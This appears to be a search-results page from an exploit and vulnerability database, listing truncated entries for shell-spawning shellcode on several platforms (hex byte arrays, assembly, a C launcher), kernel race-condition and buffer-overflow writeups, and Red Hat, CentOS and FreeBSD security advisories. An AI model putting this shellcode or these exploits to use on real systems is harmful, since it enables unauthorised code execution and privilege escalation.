37 matches found
Race you to the kernel!
Posted by Ian Beer of Google Project Zero The OS X and iOS kernel code responsible for loading a setuid root binary invalidates the old task port after first swapping the new virtual memory map pointer into the old task object, leaving a short race window where you can manipulate the memory of an...
linux/x86-64 execve/bin/sh 30 bytes
linux/x86-64 execve(/bin/sh) 30 bytes. Shellcode exploit for lin_x86-64 platform / William Borskey 2015 Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64-bit Intel assembly using yasm. ; int execve(const char *filename, char *const argv[], char *const envp[]); BITS 64 sectio...
Linux MIPS execve-vulnerability warning-the black bar safety net
#include <stdio.h> / Sanguine@debian-mipsel:~/leaveret$ cat MIPS36bsc.s .section .text .globl __start .set noreorder __start: slti $a2, $zero, -1 ; set a2 to zero p: bltzal $a2, p ; does not branch, always saves ra slti $a1, $zero, -1 ; set a1 to zero addu $a0, $ra, 4097 ; a0 = ra + 16 addu $a0, $a0, -4081 li...
Linux x86 - polymorphic execve("/bin/bash","-p",NULL) - 57 bytes
No description provided by source. / Title: Linux x86 - polymorphic execve("/bin/bash", ["/bin/bash", "-p"], NULL) - 57 bytes Author: Jonathan Salwan Mail: [email protected] Web: http://www.shell-storm.org !Database of Shellcodes http://www.shell-storm.org/shellcode/ sh sets euid, egid to uid, gid if ...
linux/x86 execve(""/bin/ash"" 0 0)
No description provided by source. / 21 byte execve"/bin/ash",0,0; shellcode for linux x86 by zasta zasta at darkircop.org / include unistd.h include stdio.h char shellcode = "\x31\xc9\xf7\xe1\x04\x0b\x52\x68" "\x2f\x61\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\xcd\x80"; void code asm" xor %ecx,%ecx...
BSD/x86 - execve(/bin/sh) - 27 bytes
No description provided by source. / execvesh.c by n0gada, 27 bytes. / #include "stdio.h" char shellcode[] = "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2" "\x52\x57\x54\xb0\x3b\xcd\x80\xe8" "\xee\xff\xff\xff/bin/sh"; int main(void) { int *ret; printf("%d\n", strlen(shellcode)); ret = (int *)&ret + 2; *ret = (int)shellcode; return...
Count.cgi (wwwcount) Remote Buffer Overflow Vulnerability
Bug CVE: CVE-1999-0021 BUGTRAQ: 128 Count.cgi (wwwcount) is a very popular web site tracking and statistics CGI program, generally used to count web page hits. In October 1997, two remote vulnerabilities were discovered in this program. The first is relatively minor: it allows a remote user to view restricted .GIF files, potentially leaking sensitive data contained in those .GIF files. The second is more serious: count.cgi has a buffer overflow when processing the QUERY_STRING environment variable. A remote attacker can send an overly long request to the program to trigger the overflow and execute arbitrary commands on the system with the privileges of the web user. 2.3 Muhammad A. Muquit...
CentOS 3 : kernel (CESA-2005:293)
Updated kernel packages that fix several security issues in the Red Hat Enterprise Linux 3 kernel are now available. This security advisory has been rated as having important security impact by the Red Hat Security Response Team. The Linux kernel handles the basic functions of the operating syste...
linux/x86 /bin/sh sysenter Opcode Array Payload 23 Bytes
No description provided by source. / lnxbinsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload Copyright (c) 2005 c0ntex [email protected] Copyright (c) 2005 BaCkSpAcE [email protected] This program is free software; you can redistribute it and/or modify it under the terms of the GNU...
Linux kernel ia32 compatibility for 64 bit platforms race conditions
Race conditions with heap memory corruption in execve syscall...
RHEL 3 : kernel (RHSA-2005:293)
Updated kernel packages that fix several security issues in the Red Hat Enterprise Linux 3 kernel are now available. This security advisory has been rated as having important security impact by the Red Hat Security Response Team. The Linux kernel handles the basic functions of the operating syste...
Important: Red Hat Security Advisory: kernel security update
Updated kernel packages that fix several security issues in the Red Hat Enterprise Linux 3 kernel are now available. This security advisory has been rated as having important security impact by the Red Hat Security Response Team. The Linux kernel handles the basic functions of the operating syste...
freebsd/x86 - execve /tmp/sh 34 bytes
freebsd/x86 execve(/tmp/sh) 34 bytes. Shellcode exploit for freebsd_x86 platform / FreeBSD shellcode - execve(/tmp/sh) Claes M. Nyberg 20020120 / void main() { asm(" xorl %eax, %eax # eax = 0 pushl %eax # string ends with NULL pushl $0x68732f2f # push 'hs//' (//sh) pushl $0x706d742f # push 'pmt/' (/tmp) movl %es...
bsd/PPC - execve /bin/sh 128 bytes
bsd/PPC execve /bin/sh 128 bytes. Shellcode exploit for bsd_ppc platform / Linux PPC shellcode execve of /bin/sh by Palante / long shellcode[] = { /* Palante's BSD PPC shellcode w/ NULL */ 0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6, 0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4, 0x38E67FF3,...
Security Advisory : FreeBSD local DoS
Security Advisory : FreeBSD local DoS Systems affected: FreeBSD 5.1-RELEASE/Alpha. Other versions are probably vulnerable. FreeBSD 5.1-RELEASE/IA32 is not vulnerable. Not sure about other FreeBSD/arch but they could be vulnerable too. Risk: low Date: 23 June 2004 Legal notice: 1. This Advisory is...
freebsd.local.txt
Security Advisory : FreeBSD local DoS Systems affected: FreeBSD 5.1-RELEASE/Alpha. Other versions are probably vulnerable. FreeBSD 5.1-RELEASE/IA32 is not vulnerable. Not sure about other FreeBSD/arch but they could be vulnerable too. Risk: low Date: 23 June 2004 Legal notice: 1. This Advisory is...
UNIX 7th Edition /bin/mkdir - Local Buffer Overflow
UNIX 7th Edition /bin/mkdir - Local Buffer Overflow / Exploit for /bin/mkdir Unix V7 PDP-11. mkdir has a buffer overflow when checking if the directory in /arg/with/slashes/fname exists. This will run /bin/sh with euid 0, but not uid 0. Since the shell doesn't do anything special about this, we don...